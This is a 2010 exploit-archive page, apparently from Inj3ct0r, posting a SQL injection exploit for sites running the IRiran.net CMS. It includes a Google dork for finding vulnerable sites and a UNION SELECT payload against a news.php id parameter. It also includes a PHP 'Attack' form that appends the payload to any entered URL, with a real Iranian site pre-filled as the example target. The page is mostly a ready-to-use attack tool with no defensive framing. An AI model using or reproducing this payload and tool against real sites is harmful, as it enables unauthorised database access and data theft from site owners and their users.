Home / os / win7

IRiran Remote Sql Injection Vulnerability

Posted on 02 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>IRiran Remote Sql Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================
IRiran Remote Sql Injection Vulnerability
=========================================


#------------In The Name Of God------------
# IRiran.net Remote Sql Injection Vulnerability
###################################
#AUTHOR: md.r00t
#Mail: md.r00t.defacer@gmail.com
#Website: www.r00t.gigfa.com
#Forum: http://forum.irangrp.com
###################################
#Google D0rk:
# &quot;Powered by: IRIran.net&quot;
###################################
# Sql Injection:
#---------
#
#Exploit=
-9999+uNIOn+select+1,2,user(),4,5,6,7,8,9,10
#
###################################
# Code:
# This code in a PHP file to be saved:

&lt;html&gt;
&lt;head&gt;
? &lt;title&gt;IRiran.net Remote Sql Injection Vulnerability [Disc0v3red By md.r00t]&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;b&gt;IRiran.net Remote Sql Injection Vulnerability&lt;/b&gt;&lt;br&gt;
&lt;b&gt;G00gl3 D0rk: &quot;Powered by: IRIran.net&quot;&lt;/b&gt;&lt;br&gt;
&lt;a href=&quot;http://www.r00t.gigfa.com&quot;&gt;&lt;b&gt;md.r00t official web site&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href=&quot;http://forum.irangrp.com&quot;&gt;&lt;b&gt;Iran Group&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
Example: http://www.provision.ir/en
&lt;form action=&quot;&quot; name=&quot;form&quot; method=&quot;POST&quot;&gt;
Target: &lt;input name=&quot;txt&quot; type=&quot;text&quot; size=&quot;50&quot; value=&quot;http://www.provision.ir/en&quot;/&gt;
&lt;input type=&quot;submit&quot; name=&quot;&quot; value=&quot;Attack&quot; /&gt;
&lt;/form&gt;
&lt;?php
$xpl=&quot;/news/news.php?id=-9999+uNIOn+select+1,2,user(),4,5,6,7,8,9,10&quot;;
$txt=strip_tags($_POST['txt']);
$link=&quot;$txt$xpl&quot;;
if($txt)
echo &quot;&lt;meta http-equiv='Refresh' content='0; url=$link'&gt;&quot;;
?&gt;
&lt;/body&gt;
&lt;/html&gt;
####################################
#TNX:
#Aria-Security Team (Persian Security Network),hadihadi(Virangar Security Team)
*****************************************


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-02]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :